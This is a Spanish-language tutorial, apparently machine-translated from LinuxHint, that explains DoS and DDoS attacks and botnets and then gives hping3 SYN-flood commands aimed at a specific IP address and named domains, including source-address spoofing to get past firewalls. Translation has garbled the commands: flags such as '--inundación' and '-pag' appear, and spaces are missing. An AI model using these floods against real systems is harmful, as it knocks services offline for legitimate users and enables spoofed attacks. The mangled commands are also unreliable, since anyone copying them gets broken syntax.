hping3 flood ddos

Hping3 Flood Ddos



Este tutorial se centra en los ataques DDOS (denegación de servicio distribuida) que utilizan la herramienta hping3. Si ya está familiarizado con los ataques DOS (Denial of Service) y DDOS, puede continuar leyendo las instrucciones prácticas de hping3; de lo contrario, se recomienda conocer cómo funcionan estos ataques.

Ataques DOS


Un ataque de denegación de servicio (DOS) es una técnica muy simple para denegar la accesibilidad a los servicios (por eso se llama ataque de denegación de servicio). Este ataque consiste en sobrecargar al objetivo con paquetes de gran tamaño, o una gran cantidad de ellos.







Si bien este ataque es muy fácil de ejecutar, no compromete la información o la privacidad del objetivo, no es un ataque penetrante y solo tiene como objetivo evitar el acceso al objetivo.
Al enviar una cantidad de paquetes, el objetivo no puede manejar a los atacantes y evitar que el servidor atienda a usuarios legítimos.



Los ataques de DOS se llevan a cabo desde un solo dispositivo, por lo tanto, es fácil detenerlos bloqueando la IP del atacante, sin embargo, el atacante puede cambiar e incluso falsificar (clonar) la dirección IP de destino, pero no es difícil para los firewalls lidiar con tales ataques. , al contrario de lo que ocurre con los ataques DDOS.



Ataques DDOS

Un ataque de denegación de servicio distribuido (DDOS) es similar a un ataque de DOS pero se lleva a cabo desde diferentes nodos (o diferentes atacantes) simultáneamente. Normalmente, los ataques DDOS los llevan a cabo botnets. Las botnets son scripts o programas automatizados que infectan las computadoras para realizar una tarea automatizada (en este caso, un ataque DDOS). Un hacker puede crear una botnet e infectar muchas computadoras desde las cuales las botnets lanzarán ataques DOS, el hecho de que muchas botnets estén disparando simultáneamente convierte el ataque DOS en un ataque DDOS (por eso se llama distribuido).





Por supuesto, existen excepciones en las que los ataques DDOS fueron realizados por atacantes humanos reales, por ejemplo el grupo de hackers Anonymous integrado por miles de personas en todo el mundo utilizó esta técnica con mucha frecuencia debido a su fácil implementación (solo requería voluntarios que compartieran su causa), Así, por ejemplo, Anonymous dejó al gobierno libio de Gadafi completamente desconectado durante la invasión, el estado libio quedó indefenso ante miles de atacantes de todo el mundo.

Este tipo de ataques, cuando se llevan a cabo desde muchos nodos diferentes, es extremadamente difícil de prevenir y detener y normalmente requiere un hardware especial para lidiar con ellos, esto se debe a que los firewalls y las aplicaciones defensivas no están preparados para lidiar con miles de atacantes simultáneamente. Este no es el caso de hping3, la mayoría de los ataques llevados a cabo a través de esta herramienta serán bloqueados por dispositivos o software defensivos, pero es útil en redes locales o contra objetivos mal protegidos.



Sobre hping3

La herramienta hping3 le permite enviar paquetes manipulados. Esta herramienta le permite controlar el tamaño, la cantidad y la fragmentación de los paquetes para sobrecargar el objetivo y evitar o atacar los firewalls. Hping3 puede ser útil para propósitos de prueba de seguridad o capacidad, usándolo puede probar la efectividad de los firewalls y si un servidor puede manejar una gran cantidad de paquetes. A continuación, encontrará instrucciones sobre cómo utilizar hping3 para realizar pruebas de seguridad.

Comenzando con los ataques DDOS usando hping3:

En Debian y distribuciones Linux basadas, puede instalar hping3 ejecutando:

#aptoInstalar en pchping3-y

Un simple ataque DOS (no DDOS) sería:

#sudohping3-S --inundación -V -pag 80170.155.9.185

Dónde:
sudo: otorga los privilegios necesarios para ejecutar hping3.
hping3:
llama al programa hping3.
-S: especifica los paquetes SYN.
-inundación: Dispare a discreción, las respuestas serán ignoradas (por eso no se mostrarán las respuestas) y los paquetes se enviarán lo más rápido posible.
-V: Verbosidad.
-p 80: puerto 80, puede reemplazar este número por el servicio que desea atacar.
170.155.9.185: IP de destino.

Flood usando paquetes SYN contra el puerto 80:

El siguiente ejemplo muestra un ataque SYN contra lacampora.org:

#sudohping3 lacampora.org-q -norte -D 120 -S -pag 80 --inundación --and-source

Dónde:
Lacampora.org: es el objetivo
-q: breve salida
-norte: muestre la IP de destino en lugar del host.
-d 120: establecer el tamaño del paquete
–Y-fuente: ocultar la dirección IP.

El siguiente ejemplo muestra otro posible ejemplo de inundación:

Inundación SYN contra el puerto 80:

#sudohping3--and-sourceivan.com-S -q -pag 80 --inundación

Con hping3 también puede atacar a sus objetivos con una IP falsa, para eludir un firewall, incluso puede clonar su IP de destino, o cualquier dirección permitida que pueda conocer (puede lograrlo, por ejemplo, con Nmap o un rastreador para escuchar establecido conexiones).

La sintaxis sería:

#sudohping3-a <IP FALSA> <objetivo> -S -q -pag 80 --más rápido -c2

En este ejemplo práctico, el ataque parecería:

#sudohping3-a190.0.175.100 190.0.175.100-S -q -pag 80 --más rápido -c2

Espero que haya encontrado útil este tutorial sobre hping3. Siga siguiendo LinuxHint para obtener más consejos y actualizaciones sobre Linux y redes.